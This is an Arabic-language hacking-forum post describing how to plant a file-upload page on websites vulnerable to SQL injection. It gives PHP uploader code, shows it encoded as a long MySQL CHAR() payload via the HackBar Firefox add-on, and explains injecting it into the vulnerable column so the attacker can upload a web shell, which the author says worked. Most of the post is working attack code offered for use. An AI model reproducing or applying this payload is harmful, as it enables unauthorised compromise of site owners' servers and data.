السلام عليكم ورحمة الله وبركاته ...
قبل فترة اكثر من شهر خطرت ببالي فكرة ...
هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL
الطريقة كالتالي ...
ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...
كود PHP:
<?php
echo '<b>Upload Center</b>';
echo '<b><br><br>'.php_u****().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST***91;'_upl'***93; == "Upload" ){ if(@copy($_FILES***91;'file'***93;***91;'tmp_****'***93;, $_FILES***91;'file'***93;***91;'****'***93;)) { echo '<b>Done !!!</b><br><br>'; }
else { echo '<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>
لازم تكون هاذي اداة Hack Bar منصب على الفيرفوكس بتاعك
من هنا تضيف اداة
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار
SQL > MySQL > MySQLCHAR
راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة
CHAR(60, 63, 112, 104, 112, 32, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 85, 112, 108, 111, 97, 100, 32, 67, 101, 110, 116, 101, 114, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 46, 112, 104, 112, 95, 117, 42, 42, 42, 42, 40, 41, 46, 39, 60, 98, 114, 62, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 102, 111, 114, 109, 32, 97, 99, 116, 105, 111, 110, 61, 34, 34, 32, 109, 101, 116, 104, 111, 100, 61, 34, 112, 111, 115, 116, 34, 32, 101, 110, 99, 116, 121, 112, 101, 61, 34, 109, 117, 108, 116, 105, 112, 97, 114, 116, 47, 102, 111, 114, 109, 45, 100, 97, 116, 97, 34, 32, 42, 42, 42, 42, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 32, 105, 100, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 105, 110, 112, 117, 116, 32, 116, 121, 112, 101, 61, 34, 102, 105, 108, 101, 34, 32, 42, 42, 42, 42, 61, 34, 102, 105, 108, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 48, 34, 62, 60, 105, 110, 112, 117, 116, 32, 42, 42, 42, 42, 61, 34, 95, 117, 112, 108, 34, 32, 116, 121, 112, 101, 61, 34, 115, 117, 98, 109, 105, 116, 34, 32, 105, 100, 61, 34, 95, 117, 112, 108, 34, 32, 118, 97, 108, 117, 101, 61, 34, 85, 112, 108, 111, 97, 100, 34, 62, 60, 47, 102, 111, 114, 109, 62, 39, 59, 32, 105, 102, 40, 32, 36, 95, 80, 79, 83, 84, 91, 39, 95, 117, 112, 108, 39, 93, 32, 61, 61, 32, 34, 85, 112, 108, 111, 97, 100, 34, 32, 41, 123, 32, 105, 102, 40, 64, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 116, 109, 112, 95, 42, 42, 42, 42, 39, 93, 44, 32, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 42, 42, 42, 42, 39, 93, 41, 41, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 68, 111, 110, 101, 32, 33, 33, 33, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 32, 32, 101, 108, 115, 101, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 33, 33, 33, 33, 33, 33, 33, 85, 112, 108, 111, 97, 100, 32, 70, 97, 105, 108, 101, 100, 33, 33, 33, 33, 33, 33, 32, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 125, 63, 62)
-----------------------------
بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك
ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره
طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....
واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..
تحياتي اخوT-VIROS Dzـــــكم
hsjyghg eyvhj SQL Inj3ti0n td hkahx lv;. vtu gvtu hgag avp>vtu>adg>sql